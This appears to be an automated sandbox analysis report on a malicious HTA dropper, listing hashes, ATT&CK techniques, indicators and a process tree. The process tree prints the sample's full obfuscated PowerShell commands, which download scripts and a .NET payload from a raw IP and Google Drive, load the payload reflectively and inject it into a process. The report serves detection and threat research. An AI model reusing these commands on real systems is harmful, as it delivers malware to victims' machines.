c0efd41f38466ebdf9a361f924bc0c6b11eb5e68c9b1adb4531df5b302f155e0

Analysis

max time kernel
146s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-10-2024 21:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greenthingswithgreatnewsforgetmeback.hta
Size

205KB
MD5

169a69d33b8480d6ba11f950cb28ff48
SHA1

f74e2a219d7cf49a08bd12dbd4dcde6b63578563
SHA256

c0efd41f38466ebdf9a361f924bc0c6b11eb5e68c9b1adb4531df5b302f155e0
SHA512

7b16659dd7c2bb88870d5c2185b323c078c4b8009bea7ecab534a3705b3c4d585e9dc42acff3122bc718ba884c801db198c73b2630ebecb8f67b17ebcf762236
SSDEEP

48:4FhWsTR/F7gNqXfkwzTqzw4S7u2WAhq0K8Kw99Dd7gZoSdrq67mz9z12gcie9NzB:43F97AcaIN6wfNcoSdrruh2iuRGQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
22	1116	powERshELL.eXE
25	3280	WScript.exe
29	3280	WScript.exe
32	2696	powershell.exe
34	2696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2696	powershell.exe
4136	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1116	powERshELL.eXE
3860	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	drive.google.com
32	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powERshELL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	powERshELL.eXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1116	powERshELL.eXE
1116	powERshELL.eXE
3860	powershell.exe
3860	powershell.exe
4136	powershell.exe
4136	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1116	powERshELL.eXE
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4608 wrote to memory of 1116	4608	mshta.exe	85
PID 4608 wrote to memory of 1116	4608	mshta.exe	85
PID 4608 wrote to memory of 1116	4608	mshta.exe	85
PID 1116 wrote to memory of 3860	1116	powERshELL.eXE	89
PID 1116 wrote to memory of 3860	1116	powERshELL.eXE	89
PID 1116 wrote to memory of 3860	1116	powERshELL.eXE	89
PID 1116 wrote to memory of 4344	1116	powERshELL.eXE	94
PID 1116 wrote to memory of 4344	1116	powERshELL.eXE	94
PID 1116 wrote to memory of 4344	1116	powERshELL.eXE	94
PID 4344 wrote to memory of 4440	4344	csc.exe	95
PID 4344 wrote to memory of 4440	4344	csc.exe	95
PID 4344 wrote to memory of 4440	4344	csc.exe	95
PID 1116 wrote to memory of 3280	1116	powERshELL.eXE	97
PID 1116 wrote to memory of 3280	1116	powERshELL.eXE	97
PID 1116 wrote to memory of 3280	1116	powERshELL.eXE	97
PID 3280 wrote to memory of 4136	3280	WScript.exe	100
PID 3280 wrote to memory of 4136	3280	WScript.exe	100
PID 3280 wrote to memory of 4136	3280	WScript.exe	100
PID 4136 wrote to memory of 2696	4136	powershell.exe	102
PID 4136 wrote to memory of 2696	4136	powershell.exe	102
PID 4136 wrote to memory of 2696	4136	powershell.exe	102

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greenthingswithgreatnewsforgetmeback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Windows\SysWOW64\wIndOWspOweRsHElL\v1.0\powERshELL.eXE
  "C:\Windows\sYstEM32\wIndOWspOweRsHElL\v1.0\powERshELL.eXE" "pOwerShELL -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE ; IeX($(IeX('[SYSteM.TEXT.encodING]'+[CHAR]58+[cHar]58+'uTF8.GeTStrINg([SYsTEm.ConVERT]'+[CHAR]0x3a+[cHaR]58+'frOMbasE64STriNg('+[chaR]34+'JHlLdEl4amsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVmaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0RyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxZEtVLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdFQURoRXFaSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd1JPVnRsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhTcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktwY3ZWayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0JvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeUt0SXhqazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1LjE0OS4yNDEuMTgzL01QRFctY29uc3RyYWludHMudmJzIiwiJGVOVjpBUFBEQVRBXG5lZXRhbmRjbGVhbnRoaW5nc2Zvcmdvb2QudmJzIiwwLDApO1N0QXJ0LXNsRUVQKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxuZWV0YW5kY2xlYW50aGluZ3Nmb3Jnb29kLnZicyI='+[ChAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3860
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1i5f5zil\1i5f5zil.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94DD.tmp" "c:\Users\Admin\AppData\Local\Temp\1i5f5zil\CSC64DCE36CC7F544C69DBC8FE305B63B3.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4440
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs"
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3280
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdmRUdpbWFnZScrJ1VybCA9IGVJR2h0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIGVJRztmRUd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2ZFR2ltYWdlQnl0ZXMgPSBmRUd3ZWJDbGllbnQuRG93bmxvYWREYXRhKGZFR2ltYWdlVXJsJysnKTtmRUdpbWEnKydnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhmRUdpbWFnZUJ5dGVzKTtmRUdzdGFydEZsYWcgPSBlSUc8JysnPEJBU0U2NF9TVEFSVD4+ZUlHO2ZFR2VuZEZsYWcgPSBlSUc8JysnPEJBU0U2NF9FTkQ+PmVJRztmRUdzdGFydEluZGV4ID0gZkVHaW1hZ2VUJysnZXh0LkluZGV4T2YoZkVHc3RhcnRGbGFnKTtmRUdlbmRJbmRleCA9IGZFR2ltYWdlVGV4dC5JbmRleCcrJ09mKGZFR2VuZEZsYWcnKycpO2ZFR3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBmRUdlbmRJbmRleCAtZ3QgZkVHc3RhcnRJbmRleCcrJztmRUdzdGFydEluZGV4ICs9IGZFR3N0YXJ0RmxhZy5MZW5ndGg7ZkVHYmFzZTY0TGVuZ3RoID0gZkVHZW5kSW5kZXggLSBmRUdzdGFydEluZGV4O2ZFR2JhcycrJ2U2NENvbW1hbmQgPSBmRUdpbWFnZVRleHQuU3Vic3RyaW5nKGZFR3N0YXJ0SW5kZXgsIGZFR2Jhc2U2NExlbmd0aCk7ZkVHYicrJ2FzZTY0UmV2ZXJzZWQgPSAtam9pbiAoZkVHYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEhldyBGJysnb3JFYWNoLU9iamVjdCB7IGZFR18nKycgfSlbLTEuLi0oZkVHYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtmRUcnKydjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGJysncm9tQmFzZTY0U3RyaW5nKGZFR2Jhc2U2NFJldmVyc2VkKTtmRUdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoZkVHY29tbWFuZEJ5dGVzKTtmRUd2YWlNZXRob2QgPSBbZG5saWIuSU8uJysnSG9tZV0uR2V0TWV0aG9kKGVJR1ZBSWVJRycrJyk7ZkVHdmFpTWV0aG9kLkludicrJ29rZShmRUdudWxsLCBAKGVJR3R4dC5kJysndWR1ZHVkdWR1RC8zODEuMTQyLjk0MS41NC8vOnB0dGhlSUcsIGVJR2QnKydlc2F0aXZhZG9lSUcsJysnIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR0FkZEluUHJvY2VzczMyZUlHLCBlSScrJ0dkZXNhdGl2YWRvZUlHLCBlSUdkZXNhdGl2YWRvZUlHLGVJR2RlJysnc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUdkZXNhdGl2YWRvZUlHLGVJR2Rlc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUcxZUlHLGVJR2Rlc2F0aXZhZG9lSUcpKTsnKS5SZVBMQUNlKChbQ2hhcl0xMDErW0NoYXJdNzMrW0NoYXJdNzEpLFtTVFJpTmddW0NoYXJdMzkpLlJlUExBQ2UoJ2ZFRycsW1NUUmlOZ11bQ2hhcl0zNikuUmVQTEFDZSgoW0NoYXJdNzIrW0NoYXJdMTAxK1tDaGFyXTExOSksW1NUUmlOZ11bQ2hhcl0xMjQpIHwuKCAkRW52OkNvTXNwRWNbNCwyNiwyNV0tSk9JTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4136
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('fEGimage'+'Url = eIGhttps:/'+'/drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur eIG;fEGwebClient = New-Object System.Net.WebClient;fEGimageBytes = fEGwebClient.DownloadData(fEGimageUrl'+');fEGima'+'geText = [System.Text.Encoding]::UTF8.GetString(fEGimageBytes);fEGstartFlag = eIG<'+'<BASE64_START>>eIG;fEGendFlag = eIG<'+'<BASE64_END>>eIG;fEGstartIndex = fEGimageT'+'ext.IndexOf(fEGstartFlag);fEGendIndex = fEGimageText.Index'+'Of(fEGendFlag'+');fEGstartIndex -ge 0 -and fEGendIndex -gt fEGstartIndex'+';fEGstartIndex += fEGstartFlag.Length;fEGbase64Length = fEGendIndex - fEGstartIndex;fEGbas'+'e64Command = fEGimageText.Substring(fEGstartIndex, fEGbase64Length);fEGb'+'ase64Reversed = -join (fEGbase64Command.ToCharArray() Hew F'+'orEach-Object { fEG_'+' })[-1..-(fEGbase64Command.Length)];fEG'+'commandBytes = [System.Convert]::F'+'romBase64String(fEGbase64Reversed);fEGloadedAssembly = [System.Reflection.Assembly]'+'::Load(fEGcommandBytes);fEGvaiMethod = [dnlib.IO.'+'Home].GetMethod(eIGVAIeIG'+');fEGvaiMethod.Inv'+'oke(fEGnull, @(eIGtxt.d'+'ududududuD/381.142.941.54//:pttheIG, eIGd'+'esativadoeIG,'+' eIGdesativadoeIG, eIGdesativadoeIG, eIGAddInProcess32eIG, eI'+'GdesativadoeIG, eIGdesativadoeIG,eIGde'+'sativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIG1eIG,eIGdesativadoeIG));').RePLACe(([Char]101+[Char]73+[Char]71),[STRiNg][Char]39).RePLACe('fEG',[STRiNg][Char]36).RePLACe(([Char]72+[Char]101+[Char]119),[STRiNg][Char]124) |.( $Env:CoMspEc[4,26,25]-JOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powERshELL.eXE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
436B

MD5
f484fd55be7e18e650745122b14e2038

SHA1
7c5dcd1b3a2167318f1e3e484847abbf9578b941

SHA256
76eac98345319fbb581f88c84ab94ed4e9a59d1b3407f9a58735d27726f376a5

SHA512
07f8541fe778b9d0f60b36fc260efb958d05b98b0f2873328aaeb1c940f10a4724bf3f6cf03f2e3cb0b6a97a6e3ba1016330f6091ea06404d5806008b00297d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
18938e410349256e7fb80c71004f86d8

SHA1
2faf8ae166cf5afc1e04e0208a1a4a0a03f324c0

SHA256
bf5643c77687be72da7facaab4073de9e21af41f21c15b6353e63aecf5b5e8f3

SHA512
ffc21466856bb57e31a48a906441f4bb1872c7fca5ba94856cc262bf81942ce592c38cdf4b95de5eae99c25bf12d35c8b35116953b47c7fc987fa615add8401b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1i5f5zil\1i5f5zil.dll

Filesize
3KB

MD5
ba2bd9b4b975e85f7a3f1e2465ebd7e4

SHA1
067f319e059d5b5a79f13b18e3c51b4aba015953

SHA256
ca4beb3c58713d2ad131fead2636fb92513ce0415474808637dc28ab22779bbc

SHA512
714546a8b9c6cef53872de84c5af1646c200be6dd4d339d783b327e038ca540564ca7b5ff8f9f4c7721b3df4f268cbf5113ebe8d051631405afc4f99ba63fe30

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES94DD.tmp

Filesize
1KB

MD5
8f7c26e65b9f47a7cfcc5822b3956845

SHA1
0f4933f8276c80f5ba5cf9a7cb26c371895f553a

SHA256
f530d72b680372efad987a94259f58d18017f80ebb6734073839b9e474b64292

SHA512
e42621a4f9527710884e7622300e9123793838e14f425079020cd3d7b410029b545f557e880646224f0e0e5ac8222702aac5250c97fde8d8c564b9483ada0303

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_unddagbk.3zc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs

Filesize
68KB

MD5
d27816d0f221aaf7a0362700a3e0a5b4

SHA1
390961053e0642b3715262962533550675dbd9b5

SHA256
9a81502d5d1efb62ca49e778c4e117b4784ead30b3565e80bdf5139d9ecd7162

SHA512
29e68d3d817699d950f6165e199eaa83cb14f9b0238e53d580ee78b2bf2c883370faf389e24b1fae8aded4758d7399a94ead882ad30398ce8cf9fa564796f76e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1i5f5zil\1i5f5zil.0.cs

Filesize
467B

MD5
d12717d89552ddb8b59a93f6d7b53650

SHA1
8141049952e7f42cd8ff2931934515a6b3901135

SHA256
90f46741701b8bb295ffb92a94a70d5233d2ec0f4a58941f7c1fa4a8d6a0276c

SHA512
42056b6146e8543dd33cc5645c6527264bfb30cc159259dae2beb03fed25aa719d257ad0e4b96ba0a02f59655ccda5bb4865623e093ad3e7dd621bd3d463a19f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1i5f5zil\1i5f5zil.cmdline

Filesize
369B

MD5
18a07fe051a618e08c35ad4f1bf6e5fb

SHA1
ad7bb1aef72aea5372e9d1b1737eb64d0c6b3182

SHA256
8f8a54fd82d718296808ac496236feb812e6c2979e7106f7943ea688337365a2

SHA512
c526f29379e77fe55df7751f77192f8d05010f90e890edb1f4742350a269d1e4d7e17d613da247050e4f1d333a75593d717c445b65cd399dddc0b4f7d2397ba7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1i5f5zil\CSC64DCE36CC7F544C69DBC8FE305B63B3.TMP

Filesize
652B

MD5
b2c0cb5e925851893589d522f50263b8

SHA1
61140d2695de1a8ff8e2d95c990890e43d5e66c2

SHA256
bb072d383e8d6b481d68ca201382458453b88511faf082eb342ca3caeda81543

SHA512
06b8cee920edc45a0f26994cc2550231d413e90ff18520b07f831011a6423d2cfc62d0d3bd851cd423f5a03d9a2b738c4295c9e73a5422cf02e9b60db6d0f119

Download Submit
memory/1116-65-0x0000000006C00000-0x0000000006C08000-memory.dmp

Filesize
32KB

Download
memory/1116-72-0x0000000070F50000-0x0000000071700000-memory.dmp

Filesize
7.7MB

Download
memory/1116-1-0x0000000005100000-0x0000000005136000-memory.dmp

Filesize
216KB

Download
memory/1116-81-0x0000000070F50000-0x0000000071700000-memory.dmp

Filesize
7.7MB

Download
memory/1116-2-0x0000000070F50000-0x0000000071700000-memory.dmp

Filesize
7.7MB

Download
memory/1116-3-0x0000000005910000-0x0000000005F38000-memory.dmp

Filesize
6.2MB

Download
memory/1116-4-0x0000000070F50000-0x0000000071700000-memory.dmp

Filesize
7.7MB

Download
memory/1116-74-0x0000000008910000-0x0000000008EB4000-memory.dmp

Filesize
5.6MB

Download
memory/1116-73-0x0000000007A20000-0x0000000007A42000-memory.dmp

Filesize
136KB

Download
memory/1116-19-0x0000000006690000-0x00000000066DC000-memory.dmp

Filesize
304KB

Download
memory/1116-71-0x0000000070F5E000-0x0000000070F5F000-memory.dmp

Filesize
4KB

Download
memory/1116-0-0x0000000070F5E000-0x0000000070F5F000-memory.dmp

Filesize
4KB

Download
memory/1116-5-0x00000000056A0000-0x00000000056C2000-memory.dmp

Filesize
136KB

Download
memory/1116-6-0x0000000005FB0000-0x0000000006016000-memory.dmp

Filesize
408KB

Download
memory/1116-7-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/1116-18-0x0000000006650000-0x000000000666E000-memory.dmp

Filesize
120KB

Download
memory/1116-17-0x0000000006090000-0x00000000063E4000-memory.dmp

Filesize
3.3MB

Download
memory/3860-44-0x0000000007180000-0x000000000718A000-memory.dmp

Filesize
40KB

Download
memory/3860-50-0x00000000073A0000-0x00000000073A8000-memory.dmp

Filesize
32KB

Download
memory/3860-48-0x0000000007360000-0x0000000007374000-memory.dmp

Filesize
80KB

Download
memory/3860-47-0x0000000007350000-0x000000000735E000-memory.dmp

Filesize
56KB

Download
memory/3860-46-0x0000000007320000-0x0000000007331000-memory.dmp

Filesize
68KB

Download
memory/3860-45-0x00000000073B0000-0x0000000007446000-memory.dmp

Filesize
600KB

Download
memory/3860-49-0x0000000007470000-0x000000000748A000-memory.dmp

Filesize
104KB

Download
memory/3860-43-0x0000000007120000-0x000000000713A000-memory.dmp

Filesize
104KB

Download
memory/3860-40-0x0000000006380000-0x000000000639E000-memory.dmp

Filesize
120KB

Download
memory/3860-41-0x0000000007010000-0x00000000070B3000-memory.dmp

Filesize
652KB

Download
memory/3860-42-0x0000000007760000-0x0000000007DDA000-memory.dmp

Filesize
6.5MB

Download
memory/3860-30-0x000000006D810000-0x000000006D85C000-memory.dmp

Filesize
304KB

Download
memory/3860-29-0x00000000063A0000-0x00000000063D2000-memory.dmp

Filesize
200KB

Download
memory/4136-87-0x0000000005DD0000-0x0000000006124000-memory.dmp

Filesize
3.3MB

Download